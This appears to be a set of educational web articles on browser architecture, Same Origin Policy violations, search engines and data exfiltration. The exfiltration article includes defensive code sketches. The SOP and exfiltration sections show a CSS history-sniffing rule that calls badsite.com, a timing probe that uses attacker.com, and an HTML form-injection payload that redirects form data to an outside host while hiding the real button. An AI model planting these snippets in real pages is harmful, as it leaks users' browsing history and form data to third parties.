Complex networks; Data mining; Big Data


The web browser is a program that retrieves documents from remote servers and displays them on the screen. It allows particular resources to be requested explicitly by URI, or implicitly by following embedded hyperlinks.

The visual appearance of a web page encoded in HTML is improved using other technologies.

The first is Cascading Style Sheets (CSS), which allow layout and style information to be added to web pages without complicating the original structural markup language.

The second is JavaScript (now standardized as the ECMAScript scripting language [1]), a scripting language for performing client-side computations within a host environment, the browser. It is embedded within HTML documents, and the displayed page is the result of evaluating the JavaScript code and applying it to the static HTML constructs.

The last is the use of plugins [2], small extensions that are loaded by the browser to display types of content that the browser cannot display directly, such as Macromedia Flash animations and Java applets.

[1] ECMA International is an industry association founded in 1961 and dedicated to the standardization of Information and Communication Technology (ICT) and Consumer Electronics (CE).
[2] A plug-in (also called plugin, addin, add-in, addon, add-on, snap-in, snapin) is a small software program that extends the capabilities of a larger program. Plugins are commonly used in web browsers to enable them to play sounds or video clips, or to decompress files automatically.


The web browser is perhaps the most widely used software application, running on diverse operating systems. For this reason, a reference architecture is useful to understand how a web browser operates and what services it supplies. A schema of the reference browser architecture is shown in Figure 1.

Figure 1 - Web browser reference architecture

The reference schema is made up of eight major subsystems plus the dependencies between them:
1. The User Interface subsystem is the layer between the user and the Browser Engine. It provides features such as toolbars, visual page-load progress, smart download handling, preferences and printing.
2. The Browser Engine subsystem is a component that provides a high-level interface to the Rendering Engine. It loads a given URI and supports primitive browsing actions such as forward, back, and reload. It provides hooks for viewing various aspects of the browsing session, such as current page load progress and JavaScript alerts. It also allows querying and manipulation of Rendering Engine settings.
3. The Rendering Engine subsystem produces a visual presentation for a given URI. It is capable of displaying HTML and Extensible Markup Language (XML) documents, optionally styled with CSS, as well as embedded content such as images. It calculates the exact page layout and may use “reflow” algorithms to incrementally adjust the position of elements on the page. This subsystem also includes the HTML parser. Well-known rendering engines include Trident (Microsoft Internet Explorer), Gecko (Firefox), WebKit (Safari) and Presto (Opera).
4. The Networking subsystem implements file transfer protocols such as HTTP and FTP. It translates between different character sets, and resolves MIME[3] media types for files (see figure 2). It may implement a cache of recently retrieved resources.


Figure 2 - Role of the MIME table

5. The JavaScript Interpreter evaluates JavaScript code, which may be embedded in web pages. JavaScript is an object-oriented scripting language developed by Brendan Eich for Netscape in 1995. Certain JavaScript functionalities, such as opening pop-up windows, may be disabled by the Browser Engine or the Rendering Engine for security purposes. The following table shows examples of JavaScript interpreters.


[3] MIME was originally intended for use with e-mail attachments: MIME stands for Multipurpose Internet Mail Extensions. Unix systems used a .mailcap file, a table associating MIME types with application programs. Early browsers made use of this capability, which has since been replaced by their own MIME configuration tables.

6. The XML Parser subsystem parses XML documents into a Document Object Model (DOM) tree.

7. The Display Backend subsystem provides drawing and windowing primitives, a set of user interface widgets, and a set of fonts. It may be tied closely with the operating system.

8. The Data Persistence subsystem stores on disk various data associated with the browsing session. These may be high-level data such as bookmarks or toolbar settings, or low-level data such as cookies, security certificates, or caches.



The following table compares a classical OS with the Internet browser.


Browser Same Origin Policy (SOP)

Two pages have the same origin if the protocol, port (if one is specified), and host are the same for both pages.




Here the origin is identified by the tuple (http, AWebSite.com, 80).



while in this case the origin is identified by (https, AWebSite.com, ).
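The origin check can be sketched with Python's urllib.parse. Following what browsers do, the sketch assumes the default port (80 for http, 443 for https) when none is given, and compares host names case-insensitively (the hostname attribute returned by urlsplit is lowercased); the example URLs are hypothetical.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url):
    """Return the (protocol, host, port) tuple that identifies a page's origin."""
    parts = urlsplit(url)
    port = parts.port or DEFAULT_PORTS.get(parts.scheme)
    return (parts.scheme, parts.hostname, port)


def same_origin(url_a, url_b):
    return origin(url_a) == origin(url_b)
```

http://AWebSite.com/a.html and http://awebsite.com:80/b/c.html share an origin, while switching to https or to port 8080 produces a different one.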

The interaction between sites of different domains is regulated by the SOP. Every browser implements this policy, which means:

  • on the client side: cookies from origin (document.domain) A are not visible to origin B, and scripts from origin A cannot read or set properties of origin B through the DOM interface;
  • on the server side: the SOP allows “send-only” communication with a remote site.

Setting document.domain changes the origin of a web page: this property sets or returns the domain name of the server from which the document originated. It can only be relaxed to a parent domain of the current one (for example, from www.AWebSite.com to AWebSite.com).


Some Same Origin Policy (SOP) Violations

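1) Tracking users by querying the user's history file.

<style> a:visited { background: url(http://www.badsite.com/trackuser.php?bank.com); } </style>
<a href="http://www.bank.com/">Hi!</a>

If the user has visited bank.com, the browser fetches the background image and badsite.com learns it. Modern browsers restrict the CSS properties that :visited may change (essentially colors), precisely to block this leak.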

This type of violation could be used for:

  • Spear phishing;
  • Marketing;
  • Using browsing history as a second authentication factor.


2) Cross-site timing attacks.

The response time depends on the user's private state, for example:

  • Whether the user is logged in or not;
  • The number of items in the shopping cart;
  • And so on.

In general, all websites leak information through timing.

A link tag can be used to leak timing information, because the browser stops parsing until the link is resolved.

<img src="http://attacker.com/img1.gif">
<link rel="stylesheet" href="http://victim.com/login.html">
<img src="http://attacker.com/img2.gif">

The attacker's server receives the requests for img1.gif and img2.gif; the time between them tells the attacker how long it took to load victim.com/login.html.



[01] Alan Grosskurth, Michael W. Godfrey, Architecture and evolution of the modern web browser, David R. Cheriton School of Computer Science, University of Waterloo, Waterloo, 2006;

[02] Iris Lai, Jared Haines Johm, Chun-Hung, Chiu Josh Fairhead, Conceptual Architecture of Mozilla Firefox (version, SEng 422 Assignment 1 Dr. Ahmed E. Hassan, 2007;

[03] Nicchi A., Web Applications: technologies and models, Edizioni Accademiche Italiane, 2014;

[04] Charles Reis, Steven D. Gribble, Isolating Web Programs in Modern Browser Architectures, University of Washington, 2009;

[05] Stanford Advanced Computer Security Certificate Program, Browser Security Model and SOP Violations, 2007.




As reported in [2], “The Indexed Web contains at least 2.02 billion pages (Saturday, 05 July, 2014)”.

As a consequence, we need a web search engine if we want to find something of interest on the Web or answers to our questions.


For this reason, search engines are generally used as the “Internet users' entry point to the digital world” [1] to make their searches (according to comScore [3], searches are defined as “user engagement with a search service with the intent to retrieve search results.”).

The following figure gives an overview of the web search scenario in relation to the huge quantity of web pages.

Web Search Engine Outlook


There are many types of web search engines working on indexed pages:


  • GENERAL SEARCH ENGINE like Google, Bing and Yahoo;
  • COMPUTATIONAL KNOWLEDGE ENGINE like www.wolframalpha.com;
  • ANSWER SEARCH ENGINE like www.chacha.com;
  • IMAGE SEARCH ENGINE like www.picsearch.com;
  • VIDEO SEARCH ENGINE like on.aol.com;
  • TORRENT SEARCH ENGINE like www.ktorrents.com;
  • PERSON SEARCH ENGINE like www.spokeo.com;
  • EMAIL SEARCH ENGINE like www.emailsherlock.com;
  • BUSINESS SEARCH ENGINE like www.business.com;
  • BLOG AND FORUM SEARCH ENGINE like omgili.com;
  • META-SEARCH ENGINE like www.dogpile.com.


Although there are many search services, web search is still dominated by Google, Microsoft and Yahoo. The following figure gives a clear idea of this, even though it refers to 2012: the graph is based on 200 billion searches done in the United States in 2012 [1].


Internet Searches 2012


The next step for web search engines will be semantic search, because people will increasingly communicate with them in a way that is much closer to their natural way of thinking. Web search engines should therefore try to understand the meaning of a query and, based on it, give the most appropriate and pertinent answer.


  1. The Global Edition of The New York Times, Friday, April 5, 2013, page 15: “Web Searches that try to read your mind”;
  2. http://www.worldwidewebsize.com/;
  3. http://www.comscore.com/: Analytics for a Digital World™.


Web Applications: technologies and models

An analysis of Web Application frameworks

Edizioni Accademiche Italiane (12.06.2014)


The book is a survey and an analysis of the technologies used to develop web applications, with particular attention to architectures and models. The survey is not exhaustive, but it gives an overview of all the players involved in web application development.

First, we analyzed:

a) web browser architecture and functionality: the browser is the client part of a web application;

b) web server architecture and functionality: the server is the more complex and active part of a web application.

Then we examined AJAX and REST, technologies that have produced a paradigm shift in web application design.

Finally, in light of the technologies analyzed, we investigated the various approaches to web application development at an appropriate level of abstraction. Because HTTP is a stateless protocol, the main focus of the investigation was on state management mechanisms and on the event loop, both on the client side and on the server side.

Web Applications: technologies and models

The picture above is courtesy of Vincenzo Guardino.


This article deals with the leakage of sensitive information from a protected network to an external network, caused by intruders who exploit the various vulnerabilities of the hardware/software system. Sensitive information can be contained in:

  • static files: images, texts, spreadsheets, phone-books, agenda etc.;
  • multimedia sessions: telephone conversations, video conferences, chat channels (text, video, images).

Leakage can happen in several ways:

- the data are exfiltrated without altering the original files;
- the data are modified: converted to a new file format or encrypted;
- the data are hidden using steganography techniques;
- the data are exfiltrated using a combination of the aforementioned techniques.
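To make the steganography case concrete, here is a minimal least-significant-bit (LSB) sketch. It assumes the cover is a raw byte buffer (for example uncompressed pixel values) and that the receiver knows the length of the hidden message; the function names are hypothetical, and real tools use more elaborate schemes. Each secret bit replaces the lowest bit of one cover byte, so every cover byte changes by at most 1 and the carrier still looks unmodified.

```python
def lsb_embed(cover: bytes, secret: bytes) -> bytes:
    """Hide `secret` in the least significant bits of `cover` (8 cover bytes per secret byte)."""
    if len(secret) * 8 > len(cover):
        raise ValueError("cover too small for secret")
    out = bytearray(cover)
    for i, byte in enumerate(secret):
        for bit in range(8):
            b = (byte >> (7 - bit)) & 1          # secret bits, most significant first
            idx = i * 8 + bit
            out[idx] = (out[idx] & 0xFE) | b     # overwrite only the lowest bit
    return bytes(out)


def lsb_extract(stego: bytes, length: int) -> bytes:
    """Recover `length` secret bytes from the least significant bits of `stego`."""
    result = bytearray()
    for i in range(length):
        value = 0
        for bit in range(8):
            value = (value << 1) | (stego[i * 8 + bit] & 1)
        result.append(value)
    return bytes(result)


cover = bytes(range(64))          # stand-in for raw pixel bytes
stego = lsb_embed(cover, b"PIN1")
print(lsb_extract(stego, 4))      # b'PIN1'
```

Because the carrier file keeps its format and almost all of its content, a filter that only looks for known sensitive strings in outgoing files will not see the hidden data.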

“Data exfiltration is the unauthorized transfer of sensitive information from a target’s network to a location which a threat actor controls”. [02]
Considering data exfiltration at several levels and analysing the related risks, we can identify the following threats:

National Security: the theft of classified documents may endanger national security;
Organizations: proprietary information can be sold to a rival company, causing a loss of competitive advantage;
Citizens: the spread of sensitive personal data could have serious privacy and security implications, such as identity theft.

For national security and for organizations, the worst scenario is when attackers not only steal data but also modify it, combining cyber-espionage with cyber-sabotage.



An attacker can exfiltrate users’ sensitive data using an “HTML form injection” attack. Here is an example that uses the formaction attribute: according to the HTML5 specification, the formaction attribute of a submit button overrides the action attribute of the form it belongs to.

Let us consider the following normal form in an HTML page:


<form action="URL" ... >

list of couples (label, data-box)

<button type="submit" ... > label </button>

</form>



We inject a submit button carrying a formaction attribute:

<form action="URL" ... >

list of couples (label, data-box)

<button type="submit" formaction="BAD URL"> Fake Search! </button>

</form>


When the injected button is clicked, the form sends its data to BAD URL instead of URL.
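The override rule can be expressed in a few lines of code. The sketch below, which assumes simple, well-formed markup, uses Python's standard html.parser to list every submit control together with the URL the browser would post to: the control's formaction if present, otherwise the form's action. The class FormTargets is hypothetical; it handles one form at a time and ignores details of the real HTML algorithm such as the `form` attribute and empty formaction values.

```python
from html.parser import HTMLParser


class FormTargets(HTMLParser):
    """Record the URL each submit control would post to (formaction overrides action)."""

    def __init__(self):
        super().__init__()
        self.action = None    # action URL of the currently open <form>, if any
        self.targets = []     # (control label, effective URL) pairs
        self._button = None   # effective URL of an open <button>, waiting for its label
        self._text = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.action = a.get("action") or ""
            return
        if self.action is None:
            return  # controls outside a form are ignored in this sketch
        # Simplification: an empty formaction is treated as absent.
        url = a.get("formaction") or self.action
        if tag == "input" and (a.get("type") or "").lower() == "submit":
            self.targets.append((a.get("value") or "", url))
        elif tag == "button" and (a.get("type") or "submit").lower() == "submit":
            self._button, self._text = url, []

    def handle_data(self, data):
        if self._button is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "button" and self._button is not None:
            self.targets.append(("".join(self._text).strip(), self._button))
            self._button = None
        elif tag == "form":
            self.action = None


page = (
    '<form action="http://www.spunctum.it" method="post">'
    '<input type="number" name="icode">'
    '<button type="submit" formaction="http://www.volucer.it"> Fake Search! </button>'
    '<input class="SButton" type="submit" value="Search!">'
    "</form>"
)
parser = FormTargets()
parser.feed(page)
parser.close()
print(parser.targets)
# [('Fake Search!', 'http://www.volucer.it'), ('Search!', 'http://www.spunctum.it')]
```

The output shows the core of the attack: the same form has two submit controls that post the same fields to two different hosts.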



The following HTML:



<form name="fsbycode" class="s4form" action="http://www.spunctum.it" method="post">

<h2>Search Guest By Numeric Code</h2>

Numeric Code: <input type="number" autocomplete="on" id="icode" name="icode" autofocus placeholder="Insert Code Number" >

<input class="SButton" type="submit" value="Search!">

</form>

produces this form in the web browser:

Normal Web Form

Now consider the abused HTML:
<form name="fsbycode" class="s4form" action="http://www.spunctum.it" method="post">

<h2>Search Guest By Numeric Code</h2>

Numeric Code: <input type="number" autocomplete="on" id="icode" name="icode" autofocus placeholder="Insert Code Number" >

<!-- BEGIN attacker's code -->
      <button type="submit" formaction="http://www.volucer.it"> Fake Search! </button>
      <style> .SButton {visibility:hidden;} </style>
<!-- END attacker's code -->

<input class="SButton" type="submit" value="Search!">

</form>



Note that the formaction attribute is supported by Internet Explorer 10, Firefox, Opera, Chrome and Safari.

In the browser, the HTML above is rendered as:

Abused Web Form
Clicking the Fake Search! button produces the following HTTP request:

POST http://www.volucer.it/ HTTP/1.1
Host: www.volucer.it
Proxy-Connection: keep-alive
Content-Length: 16
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: null
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip,deflate,sdch
Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4,he;q=0.2


This shows that the form data are sent to www.volucer.it instead of www.spunctum.it, while the injected style rule hides the legitimate Search! button from the user.
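A defender can look for this pattern in the pages a site serves. The following minimal sketch, again based on Python's standard html.parser, flags every formaction attribute whose host is not in a set of trusted hosts; the class FormactionAudit, the audit helper and the trusted host set are assumptions made for illustration. A real scanner would also have to consider injected style rules and the form's own action attribute.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit


class FormactionAudit(HTMLParser):
    """Flag formaction attributes whose target host is not in a trusted set."""

    def __init__(self, trusted_hosts):
        super().__init__()
        self.trusted = {h.lower() for h in trusted_hosts}
        self.findings = []  # (tag, formaction URL) pairs that look suspicious

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name == "formaction" and value:
                host = urlsplit(value).hostname  # lowercased; None for relative URLs
                # Relative URLs stay on the page's own site, so only absolute ones are checked.
                if host is not None and host not in self.trusted:
                    self.findings.append((tag, value))


def audit(html: str, trusted_hosts) -> list:
    """Return suspicious (tag, formaction) pairs found in `html`."""
    auditor = FormactionAudit(trusted_hosts)
    auditor.feed(html)
    auditor.close()
    return auditor.findings


abused = (
    '<form action="http://www.spunctum.it" method="post">'
    '<button type="submit" formaction="http://www.volucer.it"> Fake Search! </button>'
    '<input class="SButton" type="submit" value="Search!">'
    "</form>"
)
print(audit(abused, {"www.spunctum.it"}))  # [('button', 'http://www.volucer.it')]
```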



To face this serious problem, the security system of an ICT infrastructure must be equipped with mechanisms for prevention, detection, damage limitation and monitoring.

The goal of prevention is to lower the risk of attacks.
Blocking unauthorized communication channels prevents compromised applications from exfiltrating data outside the organization.
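A minimal default-deny egress check can illustrate the idea of blocking unauthorized channels. The sketch assumes that outbound requests are expressed as URLs and that the organization keeps a list of authorized (host, port) destinations; ALLOWED_EGRESS, its entries and egress_allowed are hypothetical. In a real infrastructure this decision would typically be enforced by firewalls or proxies rather than by application code.

```python
from urllib.parse import urlsplit

# Hypothetical egress policy: the only (host, port) destinations the organization authorizes.
ALLOWED_EGRESS = {
    ("www.spunctum.it", 80),
    ("www.spunctum.it", 443),
    ("updates.example.org", 443),
}

DEFAULT_PORTS = {"http": 80, "https": 443}


def egress_allowed(url: str, policy=ALLOWED_EGRESS) -> bool:
    """Default-deny check: allow an outbound request only if its (host, port) is listed."""
    parts = urlsplit(url)
    host = parts.hostname                      # already lowercased by urlsplit
    port = parts.port or DEFAULT_PORTS.get(parts.scheme)
    if host is None or port is None:
        return False                           # unparseable host or unknown scheme: deny
    return (host, port) in policy


print(egress_allowed("http://www.spunctum.it/"), egress_allowed("http://www.volucer.it/"))
# True False
```

With default-deny, the form post to www.volucer.it in the example above would be refused because nobody authorized that destination, even though no rule mentions it explicitly.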

We need a detection system that reveals when a web site has been compromised, so that we can react promptly to the attack.
Sensitive Information Dissemination Detection (SIDD) systems are a mechanism for stopping the leakage of sensitive information in time: they monitor the outbound traffic of the protected network and take action when suspicious packets are detected.
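The simplest form of outbound inspection is content matching. The sketch below is a toy filter, not the SIDD framework described in the references: it assumes outbound payloads are available as bytes, and the marker strings and the payment-card rule are hypothetical examples of what an organization might look for. Candidate card numbers are checked with the Luhn checksum to discard random digit runs.

```python
import re

# Hypothetical markers an organization might stamp into sensitive documents.
SENSITIVE_MARKERS = [b"CONFIDENTIAL", b"INTERNAL USE ONLY"]
# Candidate payment-card numbers: 13 to 19 digits, optionally separated by spaces or dashes.
CARD_RE = re.compile(rb"\b(?:\d[ -]?){12,18}\d\b")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum: double every second digit from the right and sum modulo 10."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def inspect_outbound(payload: bytes) -> list[str]:
    """Return the reasons (if any) why an outbound payload looks like a leak."""
    reasons = []
    upper = payload.upper()
    for marker in SENSITIVE_MARKERS:
        if marker in upper:
            reasons.append("marker:" + marker.decode())
    for m in CARD_RE.finditer(payload):
        digits = re.sub(rb"[ -]", b"", m.group()).decode()
        if luhn_ok(digits):
            reasons.append("card-number")
    return reasons


print(inspect_outbound(b"icode=1234567890"))                      # []
print(inspect_outbound(b"cc=4111 1111 1111 1111 CONFIDENTIAL"))  # ['marker:CONFIDENTIAL', 'card-number']
```

This kind of matching only works on data exfiltrated in clear form: encrypted, re-encoded or steganographically hidden data, listed earlier among the leakage techniques, passes through unnoticed.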

While an attack is in progress, we have to limit the damage.
After an attack has been detected, this is what must be done:

1) minimize the information leakage;
2) analyze which vulnerability has been exploited and whether it is structural to the system;
3) harden the security of the information system to prevent another attack of the same type.

Even if the security system does not detect any problem, it is still highly recommended to run random deep security checks, because an information leakage could have happened without anyone being aware of it.
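A random deep check can take many forms. As one possible ingredient, the sketch below re-hashes a random sample of files and compares them with SHA-256 digests recorded when the system was known to be clean; it assumes such a baseline exists, and the function names are hypothetical. It only reveals files that were modified or deleted (the sabotage case mentioned earlier); data that was silently copied leaves no trace in the files themselves and would need other evidence, such as logs of outbound traffic.

```python
import hashlib
import random
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Hash a file in 64 KiB chunks so large files do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def random_integrity_check(baseline: dict[str, str], sample_size: int, rng=None) -> list[str]:
    """Re-hash a random sample of files and return those that changed or disappeared.

    `baseline` maps file paths to SHA-256 digests recorded on a known-good system.
    """
    rng = rng or random.SystemRandom()  # unpredictable sample unless a seeded rng is passed
    sample = rng.sample(sorted(baseline), min(sample_size, len(baseline)))
    suspicious = []
    for name in sample:
        p = Path(name)
        if not p.is_file() or sha256_file(p) != baseline[name]:
            suspicious.append(name)
    return sorted(suspicious)
```

Using random.SystemRandom by default means an intruder cannot predict which files the next check will examine.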



  1. Eric Y. Chen, Sergey Gorbaty, Astha Singhal and Collin Jackson: Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control, Carnegie Mellon University;
  2. http://blog.trendmicro.com/trendlabs-security-intelligence/data-exfiltration-in-targeted-attacks/;
  3. Yali Liu, Cherita Corbett, Ken Chiang, Rennie Archibald, Biswanath Mukherjee and Dipak Ghosal, SIDD: A Framework for Detecting Sensitive Data Exfiltration by Insider Attack, University of California, USA.